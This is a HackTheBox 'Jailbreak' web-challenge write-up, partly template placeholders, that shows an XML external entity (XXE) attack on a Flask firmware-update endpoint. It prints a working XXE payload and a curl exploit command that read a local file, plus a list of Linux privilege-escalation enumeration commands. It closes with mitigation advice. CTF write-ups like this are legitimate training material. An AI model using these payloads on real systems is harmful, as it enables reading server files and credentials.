Jailbreak
Jailbreak
Platform: HackTheBox | Category: Web | Type: Challenge | Difficulty: Easy | OS: NA | Author: D3v0o0Nu11 | Date: 2026-01-28 | Status: Solved Techniques: local_file_inclusion, xxe_injection
Summary
The crew secures an experimental Pip-Boy from a black market merchant, recognizing its potential to unlock the heavily guarded bunker of Vault 79. Back at their hideout, the hackers and engineers collaborate to jailbreak the device, working meticulously to bypass its sophisticated biometric locks. U
Recon
Port scan
nmap -p- -sV -sC <TARGET> --min-rate 1000 -Pn
| Port | Service | Version | Notes |
|---|---|---|---|
| <PORT> | <SVC> | <VER> | <notes> |
Enumeration highlights
- Event:
hackthebox| ID:20260128_hackthebox_jailbreak - Tags: flask, lfi, python, xxe, xml
- Indicators: XML input accepted, application/xml content-type, firmware update, file upload/config
- Source:
20260128_hackthebox_jailbreak.md
Foothold
Vulnerability / Misconfiguration
- Local_file_inclusion
- Xxe_injection
<command>
Exploitation
- See original writeup content for detailed exploitation.
Privilege Escalation
Enumeration
sudo -l find / -perm -4000 2>/dev/null getcap -r / 2>/dev/null cat /etc/crontab ps aux
Exploitation
- N/A for challenge-type writeup; see exploitation above.
- Flag obtained via challenge solve.
<command>
Flags
| Flag | Location | Value |
|---|---|---|
| flag | REDACTED |
Key Takeaways / Lessons
- local_file_inclusion
- xxe_injection
- Tags: flask, lfi, python, xxe, xml
Original Writeup
<details><summary>Click to expand original content</summary>Jailbreak - HackTheBox
Description
The crew secures an experimental Pip-Boy from a black market merchant, recognizing its potential to unlock the heavily guarded bunker of Vault 79. Back at their hideout, the hackers and engineers collaborate to jailbreak the device, working meticulously to bypass its sophisticated biometric locks. Using custom firmware and a series of precise modifications, can you bring the device to full operational status in order to pair it with the vault door's access port.
Target: 83.136.249.164:45064
Analysis
Initial Reconnaissance
Connected to the target and discovered a Flask/Werkzeug Python web application simulating a Pip-Boy device with multiple pages:
- STAT
- INV
- DATA
- MAP
- RADIO
- ROM
Vulnerability Discovery
- Found the
/rompage containing a "Firmware Update" feature - The page accepts XML configuration input
- Discovered
/static/js/update.jswhich reveals the API endpoint:
- Endpoint:
POST /api/update - Content-Type:
application/xml
The XML parser does not properly sanitize external entities, making it vulnerable to XXE (XML External Entity) Injection.
Solution
XXE Payload
Crafted an XXE payload to read /flag.txt by defining an external entity that references the local file:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///flag.txt">
]>
<FirmwareUpdateConfig>
<Firmware>
<Version>&xxe;</Version>
<ReleaseDate>2077-10-21</ReleaseDate>
<Description>Test</Description>
<Checksum type="SHA-256">test</Checksum>
</Firmware>
</FirmwareUpdateConfig>
Exploit Command
curl -s -X POST http://83.136.249.164:45064/api/update \
-H "Content-Type: application/xml" \
-d '<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///flag.txt">
]>
<FirmwareUpdateConfig>
<Firmware>
<Version>&xxe;</Version>
<ReleaseDate>2077-10-21</ReleaseDate>
<Description>Test</Description>
<Checksum type="SHA-256">test</Checksum>
</Firmware>
</FirmwareUpdateConfig>'
Response
{
"message": "Firmware version HTB{REDACTED} update initiated."
}
The flag content was reflected in the Version field of the response, confirming successful XXE exploitation.
Mitigation
To prevent XXE attacks:
- Disable external entity processing in XML parsers
- Use
defusedxmllibrary in Python instead of standardxmlmodule - Validate and sanitize XML input
- Use less complex data formats (JSON) when possible
References
</details>Auto-tracked: saved to WriteUps; run
/xesor-reviseto fold lessons into XESXor_Methodology.md.
signed by XESXOR